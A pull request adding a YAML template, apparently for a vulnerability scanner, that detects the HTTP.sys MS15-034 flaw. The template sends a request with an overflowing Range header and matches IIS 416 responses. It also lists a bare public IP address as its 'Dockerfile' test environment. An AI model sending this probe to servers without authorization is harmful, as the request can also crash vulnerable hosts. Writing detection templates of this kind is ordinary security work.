### PR TITLE
Create poc-yaml-HTTP.SYS-MS15-034-RCE

### DIFF
--- a/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
+++ b/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
@@ -8,4 +8,4 @@ rules:
         (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
       Range: bytes=0-18446744073709551615
     follow_redirects: true
-    expression: body.bcontains(b'Requested Range Not Satisfiable')
+    expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')

--- a/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
+++ b/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
@@ -1,0 +1,11 @@
+name: poc-yaml-HTTP.SYS-MS15-034-RCE
+rules:
+  - method: GET
+    path: /
+    headers:
+      User-Agent: >-
+        Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36
+        (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
+      Range: bytes=0-18446744073709551615
+    follow_redirects: true
+    expression: body.bcontains(b'Requested Range Not Satisfiable')

--- a/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
+++ b/pocs/poc-yaml-HTTP.SYS-MS15-034-RCE
@@ -8,4 +8,4 @@ rules:
         (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
       Range: bytes=0-18446744073709551615
     follow_redirects: true
-    expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')
+    expression: headers['server'].startsWith('microsoft-iis') && status==416 && body.bcontains(b'Requested Range Not Satisfiable')

--- a/pocs/poc-yaml-http.sys-ms15-034-rce.yaml
+++ b/pocs/poc-yaml-http.sys-ms15-034-rce.yaml
@@ -1,4 +1,4 @@
-name: poc-yaml-HTTP.SYS-MS15-034-RCE
+name: poc-yaml-http.sys-ms15-034-rce
 rules:
   - method: GET
     path: /


### PR DESCRIPTION
## Summary
what POC is this PR for?
poc-yaml-HTTP.SYS-MS15-034-RCE
## POC

```yaml
name: poc-yaml-HTTP.SYS-MS15-034-RCE
rules:
  - method: GET
    path: /
    headers:
      User-Agent: >-
        Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36
        (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
      Range: bytes=0-18446744073709551615
    follow_redirects: true
    expression: status==416 && body.bcontains(b'Requested Range Not Satisfiable')
```

## Test Environment

The vuln can be reproduced in the following docker environment.

Dockerfile: 
```dockerfile
http://107.167.27.251/
```


## Remarks

Write you voice here.
